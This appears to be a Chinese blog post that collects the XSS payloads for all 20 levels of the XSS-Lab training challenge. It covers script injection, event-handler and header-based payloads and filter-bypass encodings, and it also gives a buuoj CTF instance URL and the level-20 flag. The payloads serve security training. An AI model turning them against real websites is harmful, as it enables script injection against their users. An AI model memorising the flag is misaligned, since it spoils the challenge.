XSS-Lab

1.关于20关的payload合集。

<script>alert(1)</script>
"><script>alert(1)</script>
'onclick='alert(1)
" onclick="alert(1)
"><a href="javascript:alert(1)">
"><a HrEf="javascript:alert(1)">
"><scscriptript>alert(1)</sscriptcript>
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://
?t_sort=" type="text" onclick="alert('xss')
" type="text" onmousemove="alert(1)    #将payload写到referer里
" type="text" onmousemove="alert(1) 	 #将payload写User-Agent头
" type="text" onmousemove="alert(1)    #将payload写cookie头
payload是一张图片马
http://127.0.0.1/xss-labs-master/level15.php?src='level1.php?name=<img src=1 onerror=alert(1)>'
http://127.0.0.1/xss-labs-master/level16.php?keyword=<img%0dsrc=1%0donerror=alert(1)>
http://127.0.0.1/xss-labs-master/level17.php?arg01=a&arg02=aaa onmousemove='alert(1)'
http://127.0.0.1/xss-labs-master/level18.php?arg01=a&arg02=aaa onmousemove='alert(1)'
arg01=version&arg02=<a href="javascript:alert(1)">123</a>
arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(1)

10.修改参数
image.png
修改
image.png
点击
image.png

20.如果不想走流程,可直接跳过前往20关获得flag

http://a2f864e8-582b-4d62-a066-a1fd17700dd2.node5.buuoj.cn:81/level20.php
查看源码获得
flag{ad270776-5056-479e-8119-fcf63393d388}

image.png
右键查看源码,获得flag{ad270776-5056-479e-8119-fcf63393d388}
image.png

相关推荐

  1. <span style='color:red;'>XSS</span>-<span style='color:red;'>Lab</span>

    XSS-Lab

    2024-02-11 07:42:01      30 阅读

最近更新

  1. TCP协议是安全的吗?

    2024-02-11 07:42:01       16 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-02-11 07:42:01       16 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-02-11 07:42:01       15 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-02-11 07:42:01       18 阅读

热门阅读

  1. Pinia学习笔记

    2024-02-11 07:42:01       25 阅读
  2. STM32 与 ARM 的联系

    2024-02-11 07:42:01       26 阅读
  3. 刘谦龙年春晚魔术模拟

    2024-02-11 07:42:01       28 阅读
  4. 【从浅到深的算法技巧】排序应用,查找

    2024-02-11 07:42:01       29 阅读
  5. ubuntu22.04@laptop OpenCV Get Started: 006_annotating_images

    2024-02-11 07:42:01       33 阅读
  6. 使用深度学习进行“序列到序列”分类

    2024-02-11 07:42:01       25 阅读
  7. 7 scala的类构造器

    2024-02-11 07:42:01       24 阅读
  8. 2 超级数据查看器APP 导入功能详解

    2024-02-11 07:42:01       26 阅读